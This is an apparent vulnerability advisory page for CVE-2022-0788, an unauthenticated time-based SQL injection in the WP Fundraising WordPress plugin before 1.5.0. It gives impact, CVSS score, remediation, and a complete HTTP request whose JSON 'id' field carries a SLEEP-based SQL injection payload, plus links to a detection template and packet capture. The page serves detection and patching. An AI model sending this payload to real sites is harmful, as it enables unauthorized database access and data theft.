🔙 목록으로 돌아가기

CVE-2022-0788: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection

TitleWordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
Authortheamanrawat
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database.
RemediationUpdate WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability.
CVSS Score9.8
EPSS Score0.45285
CVE IDCVE-2022-0788
CWE IDCWE-89
Tags time-based-sqli cve cve2022 sqli wordpress wp-plugin wp wp-fundraising-donation unauth wpscan wpmet vuln

🔍 Vulnerability Description

WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0
Connection: close
Content-Length: 87
Content-Type: application/json
Accept-Encoding: gzip

{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0788.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0788.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A